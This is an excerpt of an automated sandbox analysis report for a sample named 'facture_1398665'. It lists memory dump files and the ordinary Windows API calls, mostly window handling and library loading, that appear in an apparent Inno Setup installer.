    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsIconic.USER32(?), ref: 0046339B
    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 004633B9
    • GetWindowPlacement.USER32(?,0000002C), ref: 004633EF
    • SetWindowPlacement.USER32(?,0000002C), ref: 00463413
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetVersion.KERNEL32(00000000,004CC2CE,?,00000000,00000000,?,004CC2E4,?,004E945F), ref: 004CC255
    • CoCreateInstance.OLE32(005043F4,00000000,00000001,00504404,00000000), ref: 004CC27B
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047D3DC: GetCursorPos.USER32(?), ref: 0047D4B9
      • Part of subcall function 0047D524: IsWindowVisible.USER32(00000000), ref: 0047D549
      • Part of subcall function 0047D524: ShowWindow.USER32(00000000,00000000), ref: 0047D572
    • GetKeyboardState.USER32(?), ref: 0045C7F2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • Sleep.KERNEL32(00000000,00000000,004F7935,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F746E
    • FindWindowW.USER32(00000000,00000000), ref: 004F749F
    • FindWindowW.USER32(00000000,00000000), ref: 004F74DB
    • SendMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004F7531
    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004F7587
    • SendNotifyMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004F75E1
    • RegisterWindowMessageW.USER32(00000000,00000000,004F7935,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F761F
    • SendMessageW.USER32(0000FFFF,00000000,00000000,00000000), ref: 004F766D
    • PostMessageW.USER32(0000FFFF,00000000,00000000,00000000), ref: 004F76BB
    • SendNotifyMessageW.USER32(0000FFFF,00000000,00000000,00000000), ref: 004F770D
    • GetLastError.KERNEL32(00000000,004F7935,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F7765
    • OemToCharBuffA.USER32(00000000,00000000,?), ref: 004F78AE
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
      • Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
      • Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000), ref: 00413C71
    • FreeLibrary.KERNEL32(00000000,00000000,004F7935,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004F7829
    • CharToOemBuffA.USER32(00000000,00000000,?), ref: 004F78FB
      • Part of subcall function 00409458: CreateMutexW.KERNEL32(?,?,?,?,004FE333,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,004FE668,?,?,00000000,?), ref: 0040946E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005000F7
    • GetVersion.KERNEL32(kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005000FE
    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 00500113
    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 00500139
      • Part of subcall function 0040A31C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040A32F
      • Part of subcall function 0040A348: SetErrorMode.KERNEL32(00008000), ref: 0040A356
      • Part of subcall function 0040A348: LoadLibraryW.KERNEL32(00000000), ref: 0040A385
    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005002E0
    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 005002F6
    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,0050031E,?,?,?,?,00000005,00000000,00000000), ref: 00500301
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetErrorMode.KERNEL32(00008000), ref: 00469151
    • GetModuleHandleW.KERNEL32(USER32,00000000,0046929E,?,00008000), ref: 00469175
    • LoadLibraryW.KERNEL32(imm32.dll), ref: 0046919E
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • SetErrorMode.KERNEL32(?,004692A5,00008000), ref: 00469298
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047D2C8: IsChild.USER32(00000000,00000000), ref: 0047D329
      • Part of subcall function 0047A6FC: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047A703
    • SendMessageW.USER32(?,00000223,00000000,00000000), ref: 00477AEC
    • ShowWindow.USER32(00000000,00000003), ref: 00477AFC
    • ShowWindow.USER32(00000000,00000002), ref: 00477B1E
    • CallWindowProcW.USER32(00409BC4,00000000,00000005,00000000,?), ref: 00477B47
    • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 00477B6C
    • ShowWindow.USER32(00000000,?), ref: 00477B91
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00477C2D
    • GetActiveWindow.USER32 ref: 00477C43
    • ShowWindow.USER32(00000000,00000000), ref: 00477CA0
      • Part of subcall function 00470A2C: IsIconic.USER32(?), ref: 00470A48
      • Part of subcall function 00470D5C: GetCurrentThreadId.KERNEL32(Function_00070CF8,00000000,00000000,00477C6A,00000000,00477CED), ref: 00470D78
      • Part of subcall function 00470D5C: EnumThreadWindows.USER32(00000000,Function_00070CF8,00000000), ref: 00470D7E
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00477C88
    • SetActiveWindow.USER32(00000000), ref: 00477C8E
    • ShowWindow.USER32(00000000,00000001), ref: 00477CD0
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047F714: GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004AE66B,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000), ref: 0047F727
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 0047F76C: GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,004AE3B7,00000000,004AE485,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004AE8AA), ref: 0047F788
      • Part of subcall function 004DE118: RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004DE361,00000000,004DE566,?,00000005,00000000,00000000), ref: 004DE15F
    • SHGetKnownFolderPath.SHELL32(005045A0,00008000,00000000,?), ref: 004DE467
    • CoTaskMemFree.OLE32(?), ref: 004DE49D
    • SHGetKnownFolderPath.SHELL32(005045B0,00008000,00000000,?), ref: 004DE4BA
    • CoTaskMemFree.OLE32(?), ref: 004DE4F0
      • Part of subcall function 004DE1CC: RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,004DE54B,00000000,004DE566,?,00000005,00000000,00000000,?,004FCCF4), ref: 004DE22E
      • Part of subcall function 0047F040: GetEnvironmentVariableW.KERNEL32(00000000,00000000,?,00000003,?,?,?,0047F8EC,00000000,0047F97F,?,0050B17C,00000000,00000000,?,004AE2A2), ref: 0047F076
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004E69CD
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004E69E8
    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004E69FC
    • IsWow64Process.KERNELBASE(00000000,?,00000000,IsWow64Process), ref: 004E6A02
    • GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004E6A30
    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004E6A4D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047B320: SetThreadLocale.KERNEL32(00000400,?,?,?,0047B51F,00000000,0047BBCE), ref: 0047B343
      • Part of subcall function 0047BC08: SetActiveWindow.USER32(?), ref: 0047BC35
      • Part of subcall function 0047BC08: IsWindowEnabled.USER32(00000000), ref: 0047BC8D
      • Part of subcall function 0047BC08: SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040), ref: 0047BCC3
      • Part of subcall function 0047BC08: DefWindowProcW.USER32(?,00000112,0000F020,00000000), ref: 0047BCDB
      • Part of subcall function 0047BD0C: SetActiveWindow.USER32(?), ref: 0047BD2E
      • Part of subcall function 0047BD0C: ShowWindow.USER32(00000000,00000009), ref: 0047BD51
      • Part of subcall function 0047BD0C: IsWindowEnabled.USER32(00000000), ref: 0047BD73
      • Part of subcall function 0047BD0C: DefWindowProcW.USER32(?,00000112,0000F120,00000000), ref: 0047BD8F
      • Part of subcall function 0047BD0C: SetWindowPos.USER32(?,00000000,00000000,?,?,0047B69E,00000000), ref: 0047BDDB
      • Part of subcall function 0047BD0C: SetFocus.USER32(00000000), ref: 0047BE29
      • Part of subcall function 0047BBEC: LoadIconW.USER32(00000000,00007F00), ref: 0047BC02
      • Part of subcall function 0047B024: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 0047B075
    • PostMessageW.USER32(?,0000B000,00000000,00000000), ref: 0047B7B4
    • PostMessageW.USER32(?,0000B001,00000000,00000000), ref: 0047B7D9
    • SendMessageW.USER32(?,?,?,?), ref: 0047B88B
      • Part of subcall function 00405084: GetCurrentThreadId.KERNEL32(?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?,00000000,?,004FE94D,00000000), ref: 004050B5
      • Part of subcall function 00405084: FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?,00000000,?,004FE94D), ref: 00405156
      • Part of subcall function 00405084: ExitProcess.KERNEL32(00000000,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?,00000000,?,004FE94D), ref: 00405192
      • Part of subcall function 0047C148: IsWindowEnabled.USER32(00000000), ref: 0047C184
    • IsWindowEnabled.USER32(00000000), ref: 0047B934
    • IsWindowVisible.USER32(00000000), ref: 0047B949
    • GetFocus.USER32 ref: 0047B95D
    • SetFocus.USER32(00000000), ref: 0047B96C
    • SetFocus.USER32(00000000), ref: 0047B98B
    • IsWindowEnabled.USER32(00000000), ref: 0047B9E7
    • SetFocus.USER32(00000000), ref: 0047BA10
    • GetLastActivePopup.USER32(?), ref: 0047BA2F
      • Part of subcall function 00470A2C: IsIconic.USER32(?), ref: 00470A48
    • GetFocus.USER32 ref: 0047BA7B
      • Part of subcall function 00470D5C: GetCurrentThreadId.KERNEL32(Function_00070CF8,00000000,00000000,00477C6A,00000000,00477CED), ref: 00470D78
      • Part of subcall function 00470D5C: EnumThreadWindows.USER32(00000000,Function_00070CF8,00000000), ref: 00470D7E
    • SetFocus.USER32(00000000), ref: 0047BA9F
      • Part of subcall function 0047CB00: PostMessageW.USER32(?,0000B01F,00000000,00000000), ref: 0047CC23
      • Part of subcall function 0047C444: SendMessageW.USER32(?,0000B020,00000001,?), ref: 0047C46B
      • Part of subcall function 0047C3E4: SendMessageW.USER32(?,0000B020,00000000,?), ref: 0047C409
      • Part of subcall function 004690D4: SystemParametersInfoW.USER32(00000068,00000000,00456FEC,00000000), ref: 00469118
      • Part of subcall function 004690D4: SendMessageW.USER32(00457158,00000000,00000000,00000000), ref: 0046912B
      • Part of subcall function 0047B41C: DefWindowProcW.USER32(?,?,?,?), ref: 0047B449
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetClassInfoW.USER32(00400000,0047A80C,?), ref: 0047AC52
    • RegisterClassW.USER32(00503DA4), ref: 0047AC6A
      • Part of subcall function 00408D5C: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
      • Part of subcall function 0040A124: CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
    • SetWindowLongW.USER32(8840C01B,000000FC,56022444), ref: 0047AD0A
    • DeleteMenu.USER32(00000000,0000F010,00000000), ref: 0047AD86
      • Part of subcall function 0047BBEC: LoadIconW.USER32(00000000,00007F00), ref: 0047BC02
    • SendMessageW.USER32(8840C01B,00000080,00000001,00000000), ref: 0047AD2F
    • SetClassLongW.USER32(8840C01B,000000F2,00000000), ref: 0047AD45
    • GetSystemMenu.USER32(8840C01B,00000000), ref: 0047AD53
    • DeleteMenu.USER32(00000000,0000F030,00000000), ref: 0047AD62
    • DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0047AD6F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentProcessId.KERNEL32(?,00000000,004697AB), ref: 00469641
    • GlobalAddAtomW.KERNEL32(00000000), ref: 00469674
    • GetCurrentThreadId.KERNEL32(?,?,00000000,004697AB), ref: 0046968F
    • GlobalAddAtomW.KERNEL32(00000000), ref: 004696C5
    • RegisterWindowMessageW.USER32(00000000,00000000,?,?,00000000,004697AB), ref: 004696DB
      • Part of subcall function 00423814: InitializeCriticalSection.KERNEL32(00420E94,?,?,004696F1,00000000,00000000,?,?,00000000,004697AB), ref: 00423833
      • Part of subcall function 00469138: SetErrorMode.KERNEL32(00008000), ref: 00469151
      • Part of subcall function 00469138: GetModuleHandleW.KERNEL32(USER32,00000000,0046929E,?,00008000), ref: 00469175
      • Part of subcall function 00469138: LoadLibraryW.KERNEL32(imm32.dll), ref: 0046919E
      • Part of subcall function 00469138: SetErrorMode.KERNEL32(?,004692A5,00008000), ref: 00469298
      • Part of subcall function 004793CC: GetKeyboardLayout.USER32(00000000), ref: 00479411
      • Part of subcall function 004793CC: GetDC.USER32(00000000), ref: 00479466
      • Part of subcall function 004793CC: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00479470
      • Part of subcall function 004793CC: ReleaseDC.USER32(00000000,00000000), ref: 0047947B
      • Part of subcall function 0047A828: OleInitialize.OLE32(00000000), ref: 0047A859
      • Part of subcall function 0047A828: LoadIconW.USER32(00400000,MAINICON), ref: 0047A944
      • Part of subcall function 0047A828: GetModuleFileNameW.KERNEL32(00400000,?,00000100,?,?,?,00469730,00000000,00000000,?,?,00000000,004697AB), ref: 0047A988
      • Part of subcall function 0047A828: CharNextW.USER32(?), ref: 0047A9CD
      • Part of subcall function 0047A828: CharLowerW.USER32(00000000), ref: 0047A9D3
    • GetModuleHandleW.KERNEL32(USER32,00000000,00000000,?,?,00000000,004697AB), ref: 0046975E
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • IsWindowUnicode.USER32(?), ref: 00457746
    • SetWindowLongW.USER32(?,000000FC,?), ref: 00457761
    • GetWindowLongW.USER32(?,000000F0), ref: 0045776C
    • GetWindowLongW.USER32(?,000000F4), ref: 0045777E
    • SetWindowLongW.USER32(?,000000F4,?), ref: 00457791
    • SetWindowLongW.USER32(?,000000FC,?), ref: 004577AA
    • GetWindowLongW.USER32(?,000000F0), ref: 004577B5
    • GetWindowLongW.USER32(?,000000F4), ref: 004577C7
    • SetWindowLongW.USER32(?,000000F4,?), ref: 004577DA
    • SetPropW.USER32(?,00000000,00000000), ref: 004577F1
    • SetPropW.USER32(?,00000000,00000000), ref: 00457808
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetVersion.KERNEL32(00000000,004AA580,?,?,00000000,00000000,?,004E2F01), ref: 004AA48D
      • Part of subcall function 004AA434: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004AA44C
    • LoadLibraryW.KERNEL32(00000000), ref: 004AA4CA
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00474491
    • GetWindowLongW.USER32(00000000,000000EC), ref: 004744A3
    • GetClassLongW.USER32(00000000,000000E6), ref: 004744B6
    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004744F6
    • SetWindowLongW.USER32(00000000,000000EC,?), ref: 0047450A
    • SetClassLongW.USER32(00000000,000000E6,?), ref: 0047451E
    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474558
    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00474570
    • GetSystemMenu.USER32(00000000,000000FF), ref: 0047457F
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 004745A8
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
